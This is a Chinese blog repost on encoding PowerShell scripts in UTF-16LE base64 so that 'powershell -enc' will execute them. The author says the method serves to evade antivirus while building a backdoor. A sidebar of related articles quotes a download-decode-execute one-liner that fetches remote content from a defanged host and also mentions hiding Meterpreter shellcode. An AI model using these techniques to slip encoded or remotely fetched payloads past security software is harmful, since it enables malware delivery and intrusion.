powershell -enc参数无法解码base64编码payload的解决方案

最新推荐文章于 2025-07-16 14:11:56 发布
最新推荐文章于 2025-07-16 14:11:56 发布
阅读量2.6k 收藏 2
点赞数
CC 4.0 BY-SA版权
文章标签: shell
原文链接:http://www.cnblogs.com/zlgxzswjy/p/9275818.html
本文介绍了如何使用PowerShell的-enc参数来执行base64编码的脚本,并提供了一个有效的编码方法,使得编码后的脚本能够被正确解析执行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

powershell的-enc参数允许传入一个base64编码过的powershell脚本字符串作为参数来执行该powershell脚本,该方法常被用于绕过杀毒软件的主动防御机制。

今天下午在做一个后门程序时,通过在线base64编码网站编码的字符串竟然没法被powershell的-enc参数解析,解析时全是乱码,通过查找资料终于解决了这个问题

故将这个问题记录下来以备后续使用

方法引用自:http://www.pstips.net/question/5827.html

可以使用如下脚本,对所需powershell脚本进行编码,所得字符串可以被powershell的-enc参数解析

$fileContent = “所要编码的脚本”
$bytes = [System.Text.Encoding]::Unicode.GetBytes($fileContent)
$encodedCommand = [Convert]::ToBase64String($bytes)
echo $encodedCommand

编码后的脚本可以通过如下命令解析执行

powershell -enc $encodedCommand

 

转载于:https://www.cnblogs.com/zlgxzswjy/p/9275818.html

powershell base64 xor
lacoucou的专栏
05-21 772
下载解密执行一条龙: $b=$(New-Object Net.WebClient).DownloadString('hxxp://xxx.xx.xx/xx'); $d=[System.Convert]::FromBase64String($b); $t=New-Object Byte[]($d.Length); [int]$j=0; FOR([int]$i=0;$i -lt $d.Length; $i++) { $j+=66; $t[$i]=(($d[$i] -bxor ($i*3 -.
PowerShell渗透框架
weixin_62626298的博客
07-24 892
NET编程语言编写的。
powershell base64
如鹿渴慕泉水的专栏
01-27 2697
function ConvertTo-Base64($string) { $bytes = [System.Text.Encoding]::Unicode.GetBytes($string); $encoded = [System.Convert]::ToBase64String($bytes); return $encoded; } function ConvertFrom-Base64($string) { $bytes = [System.Convert]::Fr
Windows PowerShell 中的 Base64 编码
2401_88913407的博客
07-16 502
本文介绍了在Windows PowerShell中使用.NET库进行Base64编码/解码的方法。由于PowerShell没有内置Base64命令,需要借助[Convert]::ToBase64String和[Convert]::FromBase64String函数实现转换。文章详细说明了编码原理(将3个8位字节转为4个6位字节),并强调必须指定字符编码格式(如UTF-8、ASCII或Unicode)。示例演示了字符串"Motorhead"的Base64编码(TW90b3JoZWFk)及
Base64 编码的识别和解密
zhaoyong631的博客
02-24 1195
decoded_str = decoded_bytes.decode("utf-8") # 尝试解码为字符串。PowerShell -encodedcommand 参数Base64 编码使用 UTF-16-LE(小端序)。这个字符串只包含 Base64 允许的字符,并且长度是 4 的倍数,因此很可能是 Base64 编码。如果解码成功,并且输出是可读文本,那么说明是 Base64 编码的。如果 utf-8 解码失败,改用 utf-16-le 进行解码。如果没有报错,说明是 Base64 编码
PowerShell 特殊的Base64
2401_85480529的博客
11-08 984
PowerShell参数使用UTF-16LE 编码,因此需要在每个字符后面添加一个0字节来匹配其编码格式。这种做法确保 Base64 编码后的字符串在 PowerShell 解码时被正确解释,否则会因为编码不匹配而导致命令执行错误。这就是为什么要在字符后面加0的原因。
PyPowerShellXray, 用于解码公共编码PowerShell脚本的python 脚本.zip
09-17
PyPowerShellXray, 用于解码公共编码PowerShell脚本的python 脚本 PyPowerShellXray用于解码公共编码PowerShell脚本的python 脚本。希望你觉得有帮助 !更多的被 @JohnLaTwC, 2016年月 v 攻击了,向 @Lee_Holmes 道歉,而不是用 PowerSh
53af7842-65e0-4fcd-8353-f3ff6fedc3af可能是什么格式的payload报文
最新发布
07-31
- UUID隐藏在Base64编码PowerShell命令中 - 最终执行解码后的Meterpreter shellcode[^3] ### 关键特征分析 1. **UUID作用**: - 会话唯一标识符 - 流量混淆(伪装成正常UUID) - 多会话管理时的路由标记 2. *...
红队专题-漏洞挖掘-代码审计-反序列化
aming小老弟
04-21 2065
TransformedMap⽤于对Java标准数据结构Map做⼀个修饰,被修饰过的Map在添加新的元素时,将可以执⾏⼀个回调。super(map);
网络安全渗透
weixin_65908240的博客
04-06 1240
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 --exclu...
实训笔记2.0
qq_65745696的博客
03-24 968
CSRF漏洞介绍 CSRF (Cross--site request forgery,跨站请求伪造))也被称为 One Click Attack 或者 Session Riding,通常缩写为 CSRF 或者 XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与 XSS 非常不同,XSS 利用站点内的信任用户,而 CSRF 则通过伪装成受信任用户请求受信任的网站。与 XSS 攻击相比,CSRF 攻击往往不大流行(因此对其进行防范的资源也相当稀少)也难以防范,所以被认为比 XSS 更具危
PowerShell常用命令及使用方法
热门推荐
Captain_RB的博客
06-17 5万+
PowerShell 依托.NET Framework平台可以实现非常强大的功能,而且普适性强,Win7及以上系统自带,隐蔽性好,可以直接在内存中运行,能够绕过部分杀软,现将平日操作及内网渗透过程中常用命令及使用方法总结如下。...
Powershell的学习笔记
来到了学渣的博客
10-16 5065
Powershell的优点 1、PowerShell可以用来管理活动目录 2、Windows7以上的操作系统默认安装 3、很多杀毒软件检测不到PowerShell的活动 4、可以从另外一个系统中下载PowerShell脚本并执行 5、cmd通常会被杀毒软件阻止运行,而PowerShell不会 6、PowerShell无须写到磁盘中,它可以直接在内存中运行。 Powershell的执行策略 Powershell有个安全策略,默认情况下,这个执行策略会被设置受限。 Get-ExecutionPolicy命令可
[渗透测试]02 PowerShell基础
cosmoslin的博客
02-08 655
PowerShell是一种命令行外壳程序和脚本环境,它内置在 Windows 7、Windows Server 2008 R2 及更高版本的 Windows 系统中,同时 PowerShell 是构建在 .NET 平台上的,所有命令传递的都是 .NET 对象。 PowerShell 有如下特点: Windows 7 以上的操作系统默认安装 PowerShell 脚本可以运行在内存中,不需要写入磁盘 可以从另一个系统中下载 PowerShell 脚本并执行 目前很多工具都是基于 PowerShell 开发的
powershell小工具,efs加解密三剑客。
weixin_30747253的博客
08-04 179
powershell efs 加密 解密 列出 decryption list 使用前提: 网管会破解当前机子上的,win账户密码,可以用当前win账户登录。 因为这个账户中保存着win ntfs efs文件解密秘钥。如果这台机子重装了,则efs解密秘钥不存在了。 所以应该在重装前,登录员工win上的账户,然后运行我写的脚本。 脚本应该用普通用户权限执行,无需管理员权限,扫...
PowerDecode 使用教程
gitblog_00807的博客
09-16 1021
PowerDecode 使用教程 1、项目介绍 PowerDecode 是一款基于 PowerShell 的工具,专门用于解混淆多层混淆的 PowerShell 脚本。该工具能够处理多种混淆形式,包括字符串的拼接、重排序、反转、替换,以及 Base64 编码、ASCII 编码、Deflate/GZIP 压缩等。PowerDecode 不仅能够解混淆脚本,还能进行代码动态分析,提取恶意软件托管的 U...
Powershell用于加密解密方法
日升东方
08-03 4496
#################  # Powershell Allows The Loading of .NET Assemblies  # Load the Security assembly to use with this script   #################  [Reflection.Assembly]::LoadWithPartialName("System.
Powershell脚本加密以及持久化运行 + BMP隐藏Shellcode
weixin_30556959的博客
02-15 1053
工欲善其事必先利其器本文所需工具:DKMC,PWSH,Invoke-Obfuscation,empire1.DKMC(生成图片木马后门)下载地址:https://github.com/Mr-Un1k0d3r/DKMC参考链接:https://blog.youkuaiyun.com/cloudatlasm/article/details/79039391 http://www.secist.com/archi...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值